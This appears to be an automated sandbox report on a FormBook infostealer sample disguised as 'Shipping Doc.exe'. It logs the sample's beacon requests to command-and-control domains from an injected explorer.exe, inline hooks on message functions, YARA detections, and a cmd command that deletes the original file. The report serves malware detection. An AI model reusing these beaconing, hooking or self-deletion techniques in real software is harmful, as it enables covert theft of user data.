                                      Aug 3, 2021 20:42:06.128948927 CEST6063353192.168.2.38.8.8.8
                                      Aug 3, 2021 20:42:06.182670116 CEST53606338.8.8.8192.168.2.3
                                      Aug 3, 2021 20:42:09.661616087 CEST6129253192.168.2.38.8.8.8
                                      Aug 3, 2021 20:42:09.698745966 CEST53612928.8.8.8192.168.2.3

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      Aug 3, 2021 20:41:48.954216957 CEST192.168.2.38.8.8.80xe08bStandard query (0)www.bigdaddy.fishA (IP address)IN (0x0001)
                                      Aug 3, 2021 20:42:09.661616087 CEST192.168.2.38.8.8.80x9ec5Standard query (0)www.davinescosmetics.comA (IP address)IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                      Aug 3, 2021 20:41:49.091502905 CEST8.8.8.8192.168.2.30xe08bNo error (0)www.bigdaddy.fish208.113.204.236A (IP address)IN (0x0001)
                                      Aug 3, 2021 20:42:09.698745966 CEST8.8.8.8192.168.2.30x9ec5No error (0)www.davinescosmetics.comdavinescosmetics.comCNAME (Canonical name)IN (0x0001)
                                      Aug 3, 2021 20:42:09.698745966 CEST8.8.8.8192.168.2.30x9ec5No error (0)davinescosmetics.com34.102.136.180A (IP address)IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • www.bigdaddy.fish
                                      • www.davinescosmetics.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.349742208.113.204.23680C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Aug 3, 2021 20:41:49.208802938 CEST6582OUTGET /amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhR HTTP/1.1
                                      Host: www.bigdaddy.fish
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Aug 3, 2021 20:41:49.321682930 CEST6582INHTTP/1.1 301 Moved Permanently
                                      Date: Tue, 03 Aug 2021 18:41:49 GMT
                                      Server: Apache
                                      Location: http://BigDaddyUnlimited.com/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhR
                                      Content-Length: 330
                                      Connection: close
                                      Content-Type: text/html; charset=iso-8859-1
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 42 69 67 44 61 64 64 79 55 6e 6c 69 6d 69 74 65 64 2e 63 6f 6d 2f 61 6d 62 36 2f 3f 44 50 74 34 3d 62 79 34 39 6f 39 50 34 6e 62 75 54 75 4f 45 6e 32 79 38 71 33 30 51 4f 49 34 6d 43 32 57 67 52 51 50 73 54 69 4c 46 71 57 34 54 35 65 63 7a 65 58 52 56 31 4b 42 48 47 4f 41 6c 43 2b 30 48 52 35 6c 58 58 26 61 6d 70 3b 6c 38 42 3d 52 6a 41 68 52 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://BigDaddyUnlimited.com/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&amp;l8B=RjAhR">here</a>.</p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      1192.168.2.34974434.102.136.18080C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Aug 3, 2021 20:42:09.720345020 CEST6593OUTGET /amb6/?DPt4=ZduBhxyNf/T8KdukIHnfIOdlFHQuF1EsUtpfZKs5gLBpa2z0TfcmffP3A+e7CMLv2uy0&l8B=RjAhR HTTP/1.1
                                      Host: www.davinescosmetics.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Aug 3, 2021 20:42:09.835215092 CEST6594INHTTP/1.1 403 Forbidden
                                      Server: openresty
                                      Date: Tue, 03 Aug 2021 18:42:09 GMT
                                      Content-Type: text/html
                                      Content-Length: 275
                                      ETag: "61048812-113"
                                      Via: 1.1 google
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                      Code Manipulations

                                      User Modules

                                      Hook Summary

                                      Function NameHook TypeActive in Processes
                                      PeekMessageAINLINEexplorer.exe
                                      PeekMessageWINLINEexplorer.exe
                                      GetMessageWINLINEexplorer.exe
                                      GetMessageAINLINEexplorer.exe

                                      Processes

                                      Process: explorer.exe, Module: user32.dll
                                      Function NameHook TypeNew Data
                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE3
                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE3
                                      GetMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE3
                                      GetMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE3

                                      Statistics

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      Analysis Process: Shipping Doc.exe PID: 1932 Parent PID: 5704

                                      General

                                      Start time:20:40:13
                                      Start date:03/08/2021
                                      Path:C:\Users\user\Desktop\Shipping Doc.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\Shipping Doc.exe'
                                      Imagebase:0x3b0000
                                      File size:1037312 bytes
                                      MD5 hash:159D560FF64CDB2D130B1635F4123A49
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Reputation:low

                                      Analysis Process: Shipping Doc.exe PID: 2148 Parent PID: 1932

                                      General

                                      Start time:20:40:35
                                      Start date:03/08/2021
                                      Path:C:\Users\user\Desktop\Shipping Doc.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\Shipping Doc.exe
                                      Imagebase:0xe90000
                                      File size:1037312 bytes
                                      MD5 hash:159D560FF64CDB2D130B1635F4123A49
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      Analysis Process: explorer.exe PID: 3388 Parent PID: 2148

                                      General

                                      Start time:20:40:37
                                      Start date:03/08/2021
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Explorer.EXE
                                      Imagebase:0x7ff714890000
                                      File size:3933184 bytes
                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Analysis Process: cscript.exe PID: 2000 Parent PID: 3388

                                      General

                                      Start time:20:41:03
                                      Start date:03/08/2021
                                      Path:C:\Windows\SysWOW64\cscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\cscript.exe
                                      Imagebase:0xde0000
                                      File size:143360 bytes
                                      MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:moderate

                                      Analysis Process: cmd.exe PID: 3984 Parent PID: 2000

                                      General

                                      Start time:20:41:06
                                      Start date:03/08/2021
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:/c del 'C:\Users\user\Desktop\Shipping Doc.exe'
                                      Imagebase:0xbd0000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Analysis Process: conhost.exe PID: 6040 Parent PID: 3984

                                      General

                                      Start time:20:41:06
                                      Start date:03/08/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6b2800000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Disassembly

                                      Code Analysis

                                      Reset < >